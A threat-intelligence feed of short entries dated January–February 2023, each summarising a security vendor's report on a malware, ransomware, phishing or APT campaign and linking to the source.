Source: https://blog.cyble.com/2023/02/13/increase-in-fake-donation-schemes-following-massive-earthquake-in-turkey/

Intel Source:: BitSight

Intel Name:: Diving_Deep_into_Mylobot

Date of Scan:: 2023-02-14

Impact:: LOW

Summary:: BitSight researchers have analyzed the Mylobot malware and focused on its main capability, which is transforming the infected system into a proxy.

Source: https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet

Intel Source:: Group-IB

Intel Name:: Hackers_From_ChinaTargeting_GroupIB_Cybersecurity_Firm

Date of Scan:: 2023-02-14

Impact:: MEDIUM

Summary:: Group-IB researchers have identified that an APT group known as Tonto Team has tried targeting the Singapore-based Group-IB cybersecurity firm for the second time.

Source: https://www.group-ib.com/blog/tonto-team/

Intel Source:: CERT-UA

Intel Name:: Hackers_Targeting_Ukraine_Using_Remote_Utility_Program

Date of Scan:: 2023-02-14

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified a cyber attack on organizations and institutions in Ukraine using the Remote Utilities program.

Source: https://cert.gov.ua/article/3863542

Intel Source:: Huntress

Intel Name:: The_Clop_Ransomware_Claims_to_Have_Breached_130_Organizations

Date of Scan:: 2023-02-13

Impact:: MEDIUM

Summary:: Researchers from Huntress have identified that Clop ransomware gang claims to be behind recent attacks that exploited a zero-day vulnerability in the GoAnywhere MFT secure file transfer tool, saying they stole data from over 130 organizations.

Source: https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits

Intel Source:: Fortinet

Intel Name:: Supply_Chain_Attack_by_New_Malicious_Python_Package

Date of Scan:: 2023-02-13

Impact:: LOW

Summary:: FortiGate researchers have identified five malicious packages on the Python Package Index (PyPI), stealing passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers.

Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages-by-malware-author-core1337

Intel Source:: ASEC

Intel Name:: AsyncRAT_Leveraging_Windows_Help_File

Date of Scan:: 2023-02-13

Impact:: LOW

Summary:: ASEC researchers have identified that AsyncRAT is distributing as a Windows help file (*.chm).

Source: https://asec.ahnlab.com/en/47525/

Intel Source:: ASEC

Intel Name:: Website_posing_as_Naver_login_page

Date of Scan:: 2023-02-13

Impact:: LOW

Summary:: ASEC researchers have observed a situation where a fake Kakao login page is used to steal the account credentials of certain individuals.

Source: https://asec.ahnlab.com/en/47530/

Intel Source:: Reversing Labs

Intel Name:: Malicious_Npm_Package_Using_Typosquatting_to_Download_Malware

Date of Scan:: 2023-02-13

Impact:: LOW

Summary:: Reversing Labs researchers have observed a package called “aabquerys” is spotted on the open-source JavaScript npm repository using typosquatting techniques to enable the download of malicious components.

Source: https://www.reversinglabs.com/blog/open-source-malware-sows-havoc-on-supply-chain

Intel Source:: ASEC

Intel Name:: Hackers_From_Dalbit_Group_Targeting_Vulnerable_Korean_Company_Servers

Date of Scan:: 2023-02-13

Impact:: LOW

Summary:: ASEC researchers have identified that the Chinese threat actor group named Dalbit (m00nlight) is targeting vulnerable Korean company servers. Also, this group uses publicly available tools, from the WebShell used in the early stages to the ransomware used at the end.

Source: https://asec.ahnlab.com/en/47455/

Intel Source:: CISA

Intel Name:: DPRK_Malicious_Cyber_Activities

Date of Scan:: 2023-02-12

Impact:: MEDIUM

Summary:: This cybersecurity advisory provides an overview of Democratic People’s Republic of Korea (DPRK), state-sponsored ransomware and their TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa23-040a

Intel Source:: SpiderLabs Blog

Intel Name:: Hackers_Leveraging_HTML_Smuggling_to_Deliver_Malware

Date of Scan:: 2023-02-10

Impact:: LOW

Summary:: SpiderLabs researchers have analyzed some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-smuggling-the-hidden-threat-in-your-inbox/

Intel Source:: Sentinelone

Intel Name:: Malicious_Google_Ads_Targeting_AWS_Login

Date of Scan:: 2023-02-10

Impact:: LOW

Summary:: SentinelOne researchers have identified a new phishing campaign targeting Amazon Web Services (AWS) logins is abusing Google ads to sneak phishing sites into Google Search to steal login credentials.

Source: https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/

Intel Source:: CISA

Intel Name:: Ransomware_Attac_on_Critical_Infrastructure_Funded_by_DPRK

Date of Scan:: 2023-02-10

Impact:: LOW

Summary:: CISA researchers have identified TTPs and IOCs DPRK cyber actors using to gain access to and conduct ransomware attacks against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa23-040a

Intel Source:: NTT Security

Intel Name:: The_malware_attacks_distributed_by_SteelClove_group

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: NTT Security SOC team shared the latest tactics in attacks by SteelClover among the most recently observed cases of malware distribution via Google Ads. SteelClover is an attack group that has been active since 2019, and their purpose is money.

Source: https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

Intel Source:: Cybereason

Intel Name:: GootLoader_Leveraging_SEO_Poisoning_Techniques

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: Cybereason researchers have investigated an incident that involved new deployment methods of the GootLoader malware loader through heavily-obfuscated JavaScript files.

Source: https://www.cybereason.com/blog/threat-alert-gootloader-seo-poisoning-and-large-payloads-leading-to-compromise https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

Intel Source:: ISC.SANS

Intel Name:: A_Backdoor_with_Smart_Screenshot_Capability

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: Researchers from SANS have identified that backdoors and trojans implemented screenshot capabilities to “see” what’s displayed on the victim’s computer and to take a screenshot in Python.

Source: https://isc.sans.edu/diary/rss/29534

Intel Source:: SecuInfra

Intel Name:: Analysis_of_ESXiArgs_Ransomware

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: In their post SecuInfrs analysts are analyzing the recent “ESXiArgs” Ransomware variant, which spread to a large number of outdated, internet-exposed ESXi Servers around the world.

Source: https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/

Intel Source:: ASEC

Intel Name:: The_distribution_of_Quasar_RAT

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: The ASEC analysis team just discovered the Quasar RAT malware through the private Home Trading System (HTS). It is assumed that the victims did not install their HTS from an institutional financial company, but instead, they got HPlus HTS through an unsanctioned source or a disguised financial investment company. The malware, Quasar, is a RAT malware that allows threat actors to gain control over infected systems to either steal information or perform malicious behaviors.

Source: https://asec.ahnlab.com/en/47283/

Intel Source:: Sonatypa

Intel Name:: Malicious_aptX_Python_Package_Drops_Meterpreter_Shell

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: Researchers from Sonatype have identified malicious Python packages on the PyPI software registry that carry out a bunch of nefarious activities.

Source: https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat

Intel Source:: Blackberry

Intel Name:: Hackers_From_NewsPenguin_Targeting_Pakistani_Entities

Date of Scan:: 2023-02-09

Impact:: LOW

Summary:: BlackBerry researchers have identified an unknown threat actor dubbed NewsPenguin has been linked to a phishing campaign targeting Pakistani entities by leveraging the upcoming international maritime expo as a lure.

Source: https://blogs.blackberry.com/en/2023/02/newspenguin-a-previously-unknown-threat-actor-targets-pakistan-with-advanced-espionage-tool

Intel Source:: Symantec

Intel Name:: New_Russian_Information_Stealing_Malware_Graphiron

Date of Scan:: 2023-02-09

Impact:: MEDIUM

Summary:: A new russian Nodaria group has installed a new malware threat that targets to steal a wide range of information from infected computers. The Nodaria espionage group (aka UAC-0056) is using a new piece of information stealing malware against targets in Ukraine. The malware (Infostealer.Graphiron) is written in Go language and is meant to collect a wide range of information from the infected computer, including system information, credentials, screenshots, and files.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer

Intel Source:: Sentinelone

Intel Name:: Cl0p_Ransomware_Targets_Linux_Systems

Date of Scan:: 2023-02-08

Impact:: LOW

Summary:: Researchers from SentinelOne have observed the first ELF variant of Cl0p (also known as Clop) ransomware variant targeting Linux systems. The new variant is similar to the Windows variant, using the same encryption method and similar process logic.

Source: https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/

Intel Source:: Equinix Threat Analysis Center

Intel Name:: Royal_Ransomware_Targeting_VMware_ESXi_Servers_in_Linux_Devices

Date of Scan:: 2023-02-08

Impact:: LOW

Summary:: Researchers from Equinix Threat Analysis Center (ETAC) have identified that Royal ransomware updating techniques for encrypting Linux devices and specially targeting VMware ESXi virtual machines.

Source: https://twitter.com/BushidoToken/status/1621087221905514496

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_Distributing_Again_in_Korea

Date of Scan:: 2023-02-08

Impact:: LOW

Summary:: ASEC researchers have discovered the redistribution of Magniber disguised as normal Windows Installers (MSI). The distributed Magniber files have MSI as their extensions, disguising themselves as Windows update files.

Source: https://asec.ahnlab.com/en/47287/

Intel Source:: CERT-UA

Intel Name:: Hackers_Targeting_State_Bodies_of_Ukraine

Date of Scan:: 2023-02-08

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified mass distribution of e-mails and an attachment in the form of RAR- archive "court letter, information on debt.rar."

Source: https://cert.gov.ua/article/3804703

Intel Source:: TrendMicro

Intel Name:: Earth_Zhulong_Threat_Group_Targeting_Vietnam_Telecom_and_Media_Sector

Date of Scan:: 2023-02-08

Impact:: MEDIUM

Summary:: TrendMicro researchers have discovered a new hacking group that is targeting Vietnam's telecom, technology, and media sectors. The group is dubbed as Earth Zhulong and it is related to the Chinese-linked hacking group 1937CN based on similar code in the custom shellcode loader and victimology.

Source: https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-vietnam.html

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_samples_January_30th_to_February_5th_2023

Date of Scan:: 2023-02-08

Impact:: LOW

Summary:: The ASEC analysis team keeps monitoring a weekly malware collection samples for January 30 - February 5th, 2023. The top malwares for this week is SmokeLoader, BeamWinHTTP, Formbook, Quasar RAT and Redline.

Source: https://asec.ahnlab.com/en/47330/

Intel Source:: Proofpoint

Intel Name:: Newly_Threat_Actor_TA866_Distributing_Malware_via_Email

Date of Scan:: 2023-02-08

Impact:: MEDIUM

Summary:: Researchers from Proofpoint have observed a cluster of evolving financially motivated activity which they are referring to as "Screentime". The attack chain starts with an email containing a malicious attachment or URL and leads to malware that Proofpoint dubbed WasabiSeed and Screenshotter.

Source: https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Intel Source:: Cyble

Intel Name:: Ransomware_Attacks_Targeting_VMware_ESXi_Servers

Date of Scan:: 2023-02-08

Impact:: LOW

Summary:: Cyble researchers have identified a ransomware attack targeting VMware ESXi servers to deploy ESXi Args Ransomware.

Source: https://blog.cyble.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/

Intel Source:: Fortinet

Intel Name:: The_Trigona_ransomware_variant

Date of Scan:: 2023-02-07

Impact:: MEDIUM

Summary:: FortiGuard Labs got together the report for the Trigona ransomware with the details and insights of this ransomware landscape protection against those variants.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware

Intel Source:: Cyble

Intel Name:: New_Medusa_Botnet_targeting_Linux_Users

Date of Scan:: 2023-02-07

Impact:: MEDIUM

Summary:: Cyble Research and Intelligence Labs has been monitoring on the actions of the MiraiBot and its behavior. A botnet capable of Performing DDoS, Ransomware, and Bruteforce Attacks.

Source: https://blog.cyble.com/2023/02/03/new-medusa-botnet-emerging-via-mirai-botnet-targeting-linux-users/

Intel Source:: ASEC

Intel Name:: The_cases_of_threat_actors_using_Sliver_malware

Date of Scan:: 2023-02-07

Impact:: LOW

Summary:: This ASEC blog is desctibing recent cases of threat actors using Sliver in addition to Cobalt Strike and Metasploit. The ASEC (AhnLab Security Emergency response Center) analysis team keeps eye on the attacks against systems with either unpatched vulnerabilities or misconfigured settings. A recently discovered a Sliver backdoor being installed through what is presumed to be vulnerability exploitation on certain software.

Source: https://asec.ahnlab.com/en/47088/

Intel Source:: Diff Report

Intel Name:: Observed_intrusion_used_AutoHotkey_to_launch_a_keylogger

Date of Scan:: 2023-02-07

Impact:: LOW

Summary:: The Diff team observed a compromise that used with a Word document containing a malicious VBA macro, which established persistence and communication to a command and control server (C2). During the initial discovery and user enumeration, the threat actor used AutoHotkey to launch a keylogger.

Source: https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/

Intel Source:: Zscaler

Intel Name:: Analysis_of_the_AveMaria_infostealer_attack_chain

Date of Scan:: 2023-02-07

Impact:: LOW

Summary:: Zscaler’s ThreatLabz research team monitors and tracks very close active threat campaigns. In their report they provided the seven case studies that follow provide an in-depth analysis of the AveMaria infostealer attack chain and how it has been shifting over the past six months.

Source: https://www.zscaler.com/blogs/security-research/dynamic-approaches-seen-avemarias-distribution-strategy

Intel Source:: ASEC

Intel Name:: Hackers_backdoor_Windows_Devices_in_Sliver_and_BYOVD_Attacks

Date of Scan:: 2023-02-07

Impact:: LOW

Summary:: ASEC researchers have identified a new hacking campaign that exploits Sunlogin flaws to deploy the Sliver post-exploitation toolkit and launch Windows Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software.

Source: https://asec.ahnlab.com/en/47088/

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Trickbot_Malware

Date of Scan:: 2023-02-07

Impact:: MEDIUM

Summary:: Researchers from Rewterz have identified the active IOCs of Trickbot Malware. It is operating since 2016. It is primarily distributed through phishing campaigns and is known for its ability to steal sensitive information such as login credentials, financial information, and personal data.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-trickbot-malware-active-iocs-30

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_samples_January_23_29th_2023

Date of Scan:: 2023-02-06

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring weekly malware collection samples for January 23-29th, 2023. The top malwares for this week is SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and SnakeKeylogger.

Source: https://asec.ahnlab.com/en/47011/

Intel Source:: Security Joes

Intel Name:: The_Gambling_Industry_is_targeted_by_Ice_Breaker_Operation

Date of Scan:: 2023-02-06

Impact:: LOW

Summary:: In September of last year, Security Joes IRT was informed about an incident with an attempt of social engineering an online customer service platform. Due to custom-built rules and extensive employee awareness training, Security Joes IRT was able to push back these threats. Recently they tracked a new threat actor as Ice Breaker APT. Although research is still ongoing, the team is sharing this article to reveal the attacker's Modus Operandi, attack chain, ways to mitigate the threat and supported IOCs, TTPs and Yara.

Source: https://www.securityjoes.com/post/operation-ice-breaker-targets-the-gam-bl-ing-industry-right-before-it-s-biggest-gathering

Intel Source:: Deep Instinct

Intel Name:: Hackers_Leveraging_Microsoft_Visual_Studio_Add_Ins_to_Push_Malware

Date of Scan:: 2023-02-06

Impact:: LOW

Summary:: Deep Instinct researchers have observed that hackers start using Microsoft Visual Studio Tools for Office (VSTO) more often as method to achieve persistence and execute code on a target machine via malicious Office add-ins.

Source: https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors

Intel Source:: Fortinet

Intel Name:: Supply_Chain_Attack_by_New_Malicious_Python_Package_web3_essential

Date of Scan:: 2023-02-06

Impact:: MEDIUM

Summary:: FortiGate researchers have discovered another new 0-day attack in a PyPI package (Python Package Index) called web3-essential. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.

Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-by-new-malicious-python-package-web3-essential?&web_view=true

Intel Source:: Quickheal

Intel Name:: The_Details_Examination_of_Malware_Technique

Date of Scan:: 2023-02-05

Impact:: LOW

Summary:: QuickHeal researchers have observed crucial steps in the attack chain, like, how is the malware able to achieve administrative privileges to perform changes in the system.

Source: https://blogs.quickheal.com/uac-bypass-using-cmstp/

Intel Source:: Cyble

Intel Name:: New_BATLoader_Spreading_RATs_and_Stealers

Date of Scan:: 2023-02-05

Impact:: LOW

Summary:: Cyble researchers have observed a novel type of BAT loader is used to distribute a range of RAT and Stealer malware families. This loader employs an innovative method to deliver the malicious payload to the user system.

Source: https://blog.cyble.com/2023/02/02/new-batloader-disseminates-rats-and-stealers/

Intel Source:: Cyble

Intel Name:: Qakbot_Rising_with_New_Strategies

Date of Scan:: 2023-02-04

Impact:: LOW

Summary:: Cyble researchers have identified that threat actors leveraging Microsoft OneNote to infect users.

Source: https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/

Intel Source:: Sentinelone

Intel Name:: DotNET_Malware_Loaders_aka_MalVirt_Distributing_Through_Malvertising_Attack

Date of Scan:: 2023-02-04

Impact:: LOW

Summary:: SentinelOne researchers have observed a cluster of virtualized .NET malware loaders distributing through malvertising attacks and the loader dubbed MalVirt, uses obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes.

Source: https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/

Intel Source:: WithSecure

Intel Name:: Hackers_From_Korea_Exploiting_Unpatched_Zimbra_Devices

Date of Scan:: 2023-02-04

Impact:: LOW

Summary:: Researchers from WithSecurity have identified a new intelligence-gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.

Source: https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

Intel Source:: Eclecticiq

Intel Name:: Mustang_Panda_APT_Group_Targeting_Europe_With_Spearphishing_Campaign

Date of Scan:: 2023-02-04

Impact:: LOW

Summary:: EclecticIQ researchers have identified that the Mustang Panda APT group started targeting Europe with a new spearphishing campaign using a customized variant of the PlugX backdoor.

Source: https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware

Intel Source:: Aqua Blog

Intel Name:: HeadCrab_Malware_Compromising_Redis_Servers

Date of Scan:: 2023-02-03

Impact:: LOW

Summary:: Aqua security researchers have identified that around 1,200 Redis database servers worldwide have been corralled into a botnet using an elusive and severe threat dubbed HeadCrab since early September 2021.

Source: https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware

Intel Source:: ASEC

Intel Name:: Malicious_LNK_File_Disguising_as_a_Normal_HWP_Document

Date of Scan:: 2023-02-03

Impact:: LOW

Summary:: ASEC researchers have discovered the distribution of a malicious LNK file disguised as a normal HWP document, Along with a text file impersonating the National Tax Service.

Source: https://asec.ahnlab.com/en/46865/

Intel Source:: TrendMicro

Intel Name:: Hackers_From_APT34_Targeting_The_Middle_East

Date of Scan:: 2023-02-03

Impact:: LOW

Summary:: TrendMicro researchers have identified a suspicious executable that was dropped and executed on multiple machines. Upon investigation, It is inked with APT34, and the main goal is to steal users’ credentials. Even in case of a password reset or change, the malware is capable of sending the new credentials to the threat actors.

Source: https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html

Intel Source:: Proofpoint

Intel Name:: Microsoft_OneNote_Documents_Delivering_Malware_via_Email

Date of Scan:: 2023-02-02

Impact:: MEDIUM

Summary:: Proofpoint researchers have identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023.

Source: https://www.proofpoint.com/us/blog/threat-insight/onenote-documents-increasingly-used-to-deliver-malware

Intel Source:: Cyble

Intel Name:: Remote_Desktop_Files_targeted_by_evasive_malware

Date of Scan:: 2023-02-02

Impact:: MEDIUM

Summary:: Cyble Research and Intelligence Labs (CRIL) discovered a new malware named ‘Vector Stealer’, which can steal .rdp files. By stealing these RDP files it can enableThreat Actors to do RDP hijacking as these files have details about the RDP session, including information needed for remote access.

Source: https://blog.cyble.com/2023/02/01/vector-stealer-a-gateway-for-rdp-hijacking/

Intel Source:: PRODAFT

Intel Name:: Active_IOCs_of_LockBit_Green

Date of Scan:: 2023-02-02

Impact:: MEDIUM

Summary:: Researchers from Prodaft have identified that the LockBit ransomware team made a so-called "LockBit Green" version of their ransomware available.

Source: https://twitter.com/PRODAFT/status/1620066347073019905?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1620066347073019905%7Ctwgr%5E7ac44bdc778d9ee19e6e0bd4fc793c84a30904c8%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.com%2F141666%2Fcyber-crime%2Flockbit-green-ransomware-variant.html

Intel Source:: CERT-UA

Intel Name:: The_Ministry_of_Foreign_Affairs_official_of_Ukraine_Web_Resource_Imitated

Date of Scan:: 2023-02-02

Impact:: MEDIUM

Summary:: CERT-UA researchers have discovered a web page imitating the official web resource of the Ministry of Foreign Affairs of Ukraine, which offers to download software for the detection of infected computers.

Source: https://cert.gov.ua/article/3761023

Intel Source:: Checkmarx

Intel Name:: The_track_of_tactics_of_the_threat_actor_PYTA27

Date of Scan:: 2023-02-02

Impact:: LOW

Summary:: The Checkmarx threat reserachers analyzed In this blog the tactics of one attacker who has been distributing their packages for at least four months and shows no signs of stopping. This actor is tracked as PYTA27.

Source: https://checkmarx.com/blog/evolution-of-a-software-supply-chain-attacker/

Intel Source:: PaloAlto

Intel Name:: GuLoader_Encrypted_With_NSIS_Crypter

Date of Scan:: 2023-02-02

Impact:: LOW

Summary:: In their post post, the Unit 42 researchers discussed a machine learning pipeline and analyses of one GuLoader downloader that has been encrypted with an Nullsoft Scriptable Install System (NSIS) crypter. NSIS is an open source system to create Windows installers.

Source: https://unit42.paloaltonetworks.com/malware-detection-accuracy/

Intel Source:: ASEC

Intel Name:: CoinMiners_Mining_Ethereum_Classic_Coins_attack_cases

Date of Scan:: 2023-02-02

Impact:: LOW

Summary:: The ASEC analysis team is observing CoinMiners that are targeting Korean and overseas users. The ASEC analysis team studied cases of various types of CoinMiner attacks over multiple blog posts in the past. They shared information to introduce the recently discovered malware that mine Ethereum Classic coins.

Source: https://asec.ahnlab.com/en/46774/

Intel Source:: Rapid7

Intel Name:: The_spread_of_Redline_Infostealer_Malware

Date of Scan:: 2023-02-02

Impact:: MEDIUM

Summary:: Recently, Rapid7 discovered the activity of malicious actors using OneNote files to deliver malicious code. Rapid 7 found a specific technique that used OneNote files containing batch scripts, which upon execution started an instance of a renamed PowerShell process to decrypt and execute a base64 encoded binary.

Source: https://www.rapid7.com/blog/post/2023/01/31/rapid7-observes-use-of-microsoft-onenote-to-spread-redline-infostealer-malware/

Intel Source:: ASEC

Intel Name:: TZW_Ransomware_Distributing_in_Korea

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: ASEC researchers have discovered the distribution of the TZW ransomware, which encrypts files before adding the “TZW” file extension to the original extension.

Source: https://asec.ahnlab.com/en/46812/

Intel Source:: Secureworks

Intel Name:: The_Similarities_Between_Abraham_s_Ax_and_Moses_Staff_Group

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: Researchers from SecureWorks have analyzed the similarities between the Moses Staff hacktivist group persona that emerged in September 2021 and the Abraham's Ax persona that emerged in November 2022.

Source: https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff

Intel Source:: Resecurity

Intel Name:: New_Version_of_Nevada_Ransomware

Date of Scan:: 2023-02-01

Impact:: MEDIUM

Summary:: Resecurity researchers have identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors behind this new project have an affiliate platform first introduced on the RAMP underground community, which is known for initial access brokers (IABs) and other cybercriminal actors and ransomware groups.

Source: https://resecurity.com/blog/article/nevada-ransomware-waiting-for-the-next-dark-web-jackpot

Intel Source:: Quickheal

Intel Name:: LockBit_s_new_Black_variant_attack

Date of Scan:: 2023-02-01

Impact:: MEDIUM

Summary:: The Quickheak team investigated and analyzed about the LockBit’s new Black variant attack. They have determined that the new LockBit 3.0 variant has a high infection vector and attack chain exhibiting substantial anti-forensic activity. This variant showed that is capable of clearing the event logs, killing multiple tasks, and deleting services simultaneously. It also can obtain initial access to the victim’s network via SMB brute forcing from various IPs.

Source: https://blogs.quickheal.com/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/

Intel Source:: Inky

Intel Name:: An_ongoing_phishing_campaign_that_impersonates_Southwest_Airlines

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: Last December, INKY observed and detected an ongoing phishing campaign that impersonates Southwest Airlines. Phishing emails are being sent from newly created domains, set up explicitly for these attacks.

Source: https://www.inky.com/en/blog/fresh-phish-southwests-flying-phish-takes-off-with-your-credentials

Intel Source:: ASEC

Intel Name:: An_Email_Specific_Phishing_Page

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: ASEC researchers have identified multiple phishing emails that are distributed with a changing icon to reflect the mail account service entered by the user and send a warning that their account will be shut down, prompting them to click the ‘Reactivate Now’ link if they need their account kept active.

Source: https://asec.ahnlab.com/en/46786/

Intel Source:: Fortinet

Intel Name:: The_Analysis_of_Cryptojacks_System_to_Mine_for_Monero_Crypto

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: Fortinet researchers have analyzed the crypto miner software that is delivering via the Excel document and executing it on the victim device.

Source: https://www.fortinet.com/blog/threat-research/malicious-code-cryptojacks-device-to-mine-for-monero-crypto?&web_view=true

Intel Source:: ASEC

Intel Name:: Phishing_Emails_Circulating_With_Requests_for_Product_Quotation

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: Researchers from ASEC have identified phishing emails with content related to requests for product quotations. These phishing emails are all disguised to seem as if they were sent by a manager with a high position, such as the team leader or department director of production companies or foundries, and were also .html and .htm attachments.

Source: https://asec.ahnlab.com/en/46199/

Intel Source:: Esentire

Intel Name:: Changes_in_the_IcedID_malware_strategy

Date of Scan:: 2023-02-01

Impact:: MEDIUM

Summary:: Last December 2022, Esentire threat intel team observed IcedID infections that were traced to payloads downloaded by users from the Internet. This observation matched with a general uptick in successful IcedID infections in Q4 of 2022, which saw 35% percent of IcedID incidents for the period between January 2022 and January 2023. The observed IcedID infections have originated exclusively via drive-by attacks, specifically Google Search Ads targeting common applications.

Source: https://www.esentire.com/blog/icedid-malware-shifts-its-delivery-strategy

Intel Source:: Malwarebytes

Intel Name:: Google_Ads_Targeting_Password_Manager

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: Researchers from Malwarebytes have identified a new malvertising campaign that makes use of Google Ads to target users looking for password managers.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/01/google-sponsored-ads-malvertising-targets-password-manager

Intel Source:: Checkpoint

Intel Name:: Malware_Packer_TrickGate_Using_by_Several_Malware_to_Evade_Detection

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: Researchers from Checkpoint have identified a shellcode-based packer dubbed TrickGate has been successfully operating without attracting notice for over six years, while enabling threat actors to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil over the years.

Source: https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

Intel Source:: Welivesecurity

Intel Name:: NikoWiper_Malware_Targeting_Ukraine_Energy_Sector

Date of Scan:: 2023-02-01

Impact:: LOW

Summary:: ESET researchers have analyzed the activities of selected APT groups and identified the Russia-affiliated Sandworm using another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine.

Source: https://www.welivesecurity.com/wp-content/uploads/2023/01/eset_apt_activity_report_t32022.pdf

Intel Source:: ASEC

Intel Name:: ASEC_Weekly_Malware_samples_January_16_22nd_2023

Date of Scan:: 2023-01-31

Impact:: LOW

Summary:: The ASEC analysis team keep monitoring weekly malware collection samples for January 16-22nd, 2023. They shared their analyses of the cases of distribution of phishing emails during this week and provide statistical information on each type.

Source: https://asec.ahnlab.com/en/46464/

Intel Source:: TrendMicro

Intel Name:: The_Magniber_ransomware_spotlight

Date of Scan:: 2023-01-31

Impact:: MEDIUM

Summary:: After it was originally discovered in 2017, Magniber came back in 2021. It is aiming some Asian countries and TrendMicro found out about the exploitation of new vulnerabilities for initial access, including CVE-2021-26411, CVE-2021-40444, and most notably the PrintNightmare vulnerability, CVE-2021-34527

Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-magniber

Intel Source:: Recorded Future

Intel Name:: Hackers_From_BlueBravo_Deploying_GraphicalNeutrino_Malware

Date of Scan:: 2023-01-31

Impact:: LOW

Summary:: Recorded Future researchers have identified the new malware used by BlueBravo threat group, which overlaps with Russian APT activity tracked as APT29 and NOBELIUM, which Western governments and researchers have linked to the Russian Foreign Intelligence Service (SVR).

Source: https://www.recordedfuture.com/bluebravo-uses-ambassador-lure-deploy-graphicalneutrino-malware

Intel Source:: Esentire

Intel Name:: The_Deep_Examination_of_Venom_Spider

Date of Scan:: 2023-01-30

Impact:: LOW

Summary:: Esentire researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona badbullzvenom.

Source: https://www.esentire.com/web-native-pages/unmasking-venom-spider

Intel Source:: Mandiant

Intel Name:: Gootkit_Malware_Updating_With_New_Components_and_Obfuscations

Date of Scan:: 2023-01-30

Impact:: LOW

Summary:: Mandiant researchers have identified that the threat actors associated with the Gootkit malware have made notable changes to their toolset, adding new components and obfuscations to their infection chains.

Source: https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations

Intel Source:: CERT-UA

Intel Name:: Hackers_From_Sandworm_Group_Targeting_News_Agencies

Date of Scan:: 2023-01-30

